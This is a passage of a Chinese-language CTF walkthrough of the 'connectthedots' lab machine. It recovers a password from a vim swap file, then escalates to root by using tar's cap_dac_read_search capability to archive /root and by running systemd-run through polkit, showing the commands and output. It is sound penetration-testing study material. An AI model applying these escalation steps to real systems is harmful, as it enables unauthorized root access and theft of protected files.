File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 245
Image Height                    : 245
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 255
Animation Iterations            : Infinite
XMP Toolkit                     : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
Creator Tool                    : Adobe Photoshop CS6 (Macintosh)
Instance ID                     : xmp.iid:085685312E1611E2A32B9E634BBB29DA
Document ID                     : xmp.did:085685322E1611E2A32B9E634BBB29DA
Derived From Instance ID        : xmp.iid:A5C200202E1511E2A32B9E634BBB29DA
Derived From Document ID        : xmp.did:085685302E1611E2A32B9E634BBB29DA
Transparent Color               : 255
Frame Count                     : 25
Duration                        : 2.50 s
Image Size                      : 245x245
Megapixels                      : 0.060
    4 image files read

发现了字符串，似乎是摩斯电码，尝试在线工具解码

解码成功，得到了字符串，给了一个提示，意思是说有个 ‘secretfile’可以被公开访问，密码就在其中，继续查看 bak 文件

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ cat hits.txt.bak 
https://pastebin.com/ZV1MLSEE

给了一个网址，打开还是提示我们要尽力枚举。我们进到网站目录下看看

norris@sirrom:~/ftp/files$ cd /var/www/html
norris@sirrom:/var/www/html$ ls -liah
total 368K
264592 drwxr-xr-x 4 root     root     4.0K Oct 11  2019 .
264591 drwxr-xr-x 3 root     root     4.0K Oct 11  2019 ..
312910 -rw-r--r-- 1 www-data www-data 6.2K Oct 11  2019 backups
312911 -rw-r--r-- 1 www-data www-data  325 Oct 11  2019 backups.html
312916 -rw-r--r-- 1 www-data www-data  77K Oct 10  2019 bootstrap.bundle.min.js
312918 -rw-r--r-- 1 www-data www-data 153K Oct 10  2019 bootstrap.min.css
312909 -rw-r--r-- 1 www-data www-data   44 Oct 11  2019 hits.txt
312905 drwxr-xr-x 2 www-data www-data 4.0K Oct 11  2019 images
312904 -rw-r--r-- 1 www-data www-data 2.2K Oct 11  2019 index.htm
266382 -rw-r--r-- 1 www-data www-data 2.0K Oct 11  2019 index.html
312919 -rw-r--r-- 1 www-data www-data  70K Oct 10  2019 jquery.slim.min.js
312880 -rw-r--r-- 1 www-data www-data  879 Oct 11  2019 landing.css
312866 drwxr-xr-x 2 www-data www-data 4.0K Oct 11  2019 mysite
312922 -rw-r--r-- 1 www-data www-data   99 Oct 11  2019 secretfile
312917 -rw------- 1 www-data www-data  12K Oct 11  2019 .secretfile.swp

确实有个 secretfile

norris@sirrom:/var/www/html$ cat secretfile 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.

但是似乎没有信息，还有个 swp 文件，用户权限无法打开，经过搜索发现，可能是 vi 或者 vim 的缓存文件，wget 下载到本机，然后使用 vim -r 命令打开得到下图的结果

这样我们就拿到了又一个密码，尝试登录，经过测试发现是 morris 的密码，登录成功后，发现并不是 root 权限，还是需要进行提权。可以按照之前的手法来提权，这里复现一下红队笔记中采用的提权思路

norris@sirrom:/var/www/html$ su morris
Password: 
morris@sirrom:/var/www/html$ cd /home
morris@sirrom:/home$ ls
morris  norris
morris@sirrom:/home$ cd morris
morris@sirrom:~$ ls
Templates
morris@sirrom:~$ id
uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)

tar 命令读取 root.txt

morris 和 norris 两个用户似乎差别并没有那么大，接下来就先在 norris 找一下提权的突破点

norris@sirrom:/var/www/html$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
norris@sirrom:/var/www/html$ su morris
Password: 
morris@sirrom:/var/www/html$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
morris@sirrom:/var/www/html$ tar -zcvf root.tat.gz /root
bash: /usr/bin/tar: Permission denied
morris@sirrom:/var/www/html$ exit
exit
norris@sirrom:~$ tar -zcvf root.tar.gz /root
tar: Removing leading `/\' from member names
/root/
/root/root.txt
/root/.bashrc
/root/.gnupg/
/root/.gnupg/private-keys-v1.d/
/root/.bash_history
/root/.cache/
/root/.local/
/root/.local/share/
/root/.local/share/nano/
/root/.profile

虽然两个用户的权限看起来一样，但是执行起来后，只有 norris 可以将 root 目录下的东西进行打包，解压缩后查看文件内容

norris@sirrom:~$ tar -zxvf root.tar.gz 
root/
root/root.txt
root/.bashrc
root/.gnupg/
root/.gnupg/private-keys-v1.d/
root/.bash_history
root/.cache/
root/.local/
root/.local/share/
root/.local/share/nano/
root/.profile
norris@sirrom:~$ cat root/root.txt 
8fc9376d961670ca10be270d52eda423

emmm，怎么说呢，这个思路确实很骚，在一些只希望获取到某些文件或者 flag 的情况下或许会非常有帮助，而 getcap 命令我是第一次见到，也算学习了

polkit-agent-helper-1 提权

norris@sirrom:~$ find / -type f -perm -u=s 2>/dev/null
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/bwrap
/usr/bin/mount
/usr/bin/su
/usr/bin/pkexec
/usr/bin/ntfs-3g
/usr/bin/chsh
/usr/bin/sudo

polkit-agent-helper-1 用于提权我也是第一次遇到，之后还是得按红队笔记的视频汇总一下提权手法

morris@sirrom:~$ systemd-run -t bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.                                                
Authenticating as: norris,,, (norris)
Password: 
==== AUTHENTICATION COMPLETE ===
Running as unit: run-u127.service                                                                                   
Press ^] three times within 1s to disconnect TTY.
root@sirrom:/# id
uid=0(root) gid=0(root) groups=0(root)
root@sirrom:/# cat /root/root.txt
8fc9376d961670ca10be270d52eda423
root@sirrom:/#

polkit 是 Linux 权限管理的一套机制（policy kit），helper 是当操作文件需要权限的时候，helper 会给一个交互界面，如果想办法调用 helper 进而带来权限上的提升。systemd-run 是临时启动高权限，这时候就会调用 helper，进而获取到 helper 属主的权限。这里有个有意思的事情，就是运行后需要授权密码，需要的是 norris 的密码